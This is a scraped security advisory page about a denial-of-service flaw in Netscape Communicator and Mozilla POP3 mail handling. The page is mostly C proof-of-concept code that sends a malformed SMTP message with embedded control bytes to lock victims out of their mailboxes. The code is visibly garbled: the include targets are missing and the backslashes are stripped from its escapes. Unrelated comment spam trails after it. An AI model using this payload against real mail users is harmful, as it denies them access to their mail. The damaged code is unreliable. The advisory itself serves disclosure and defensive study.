source: http://www.securityfocus.com/bid/5002/info
The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux.
Under some circumstances, malformed email messages may prevent Netscape and Mozilla clients from accessing POP3 mailboxes. In particular, users will be unable to access more recent messages or delete the malicious email.
/* this is the code that comes with my
* advisory #1 to illustrate this...
* eldre8 at afturgurluk (double dot minus one) org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define MX "localhost"
#define EHLO "EHLO mxrn"
#define MAIL "MAIL FROM: root@localhostrn"
#define RCPT "RCPT TO: root@localhostrn"
#define DATA "DATArn"
#define QUIT "QUITrn"
#define PORT 25
int sock;
char buffer[255];
void SigCatch() {
fprintf(stderr, "bbbye!n");
close(sock);
exit(0);
}
int main() {
/* I was too lame to implement the command line... :) */
int i;
struct sockaddr_in sout;
struct hostent *hp;
signal(SIGINT, SigCatch);
hp=gethostbyname(MX);
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock<0) {
perror("sock");
return -1;
}
sout.sin_family=AF_INET;
sout.sin_port=htons(PORT);
memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
if (connect(sock, &sout, sizeof(sout))<0) {
perror("connect");
return -1;
}
recv(sock, buffer, 255, 0); /* receive the banner... */
send(sock, EHLO, sizeof(EHLO), 0);
recv(sock, buffer, 255, 0); /* receive the welcome message... */
send(sock, MAIL, sizeof(MAIL), 0);
recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
send(sock, RCPT, sizeof(RCPT), 0);
recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
send(sock, DATA, sizeof(DATA), 0);
recv(sock, buffer, 255, 0);
i=sprintf(buffer, "b4d maIl 1n 4KT1oN!nx0ax0dx2ex0dx20x0ax0anblabla...x0ax20");
*(buffer+i)="x0";
sprintf(buffer+i+1, "n.n");
send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
recv(sock, buffer, 255, 0);
send(sock, QUIT, sizeof(QUIT), 0);
recv(sock, buffer, 255, 0);
close(sock);
return 0;
}
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666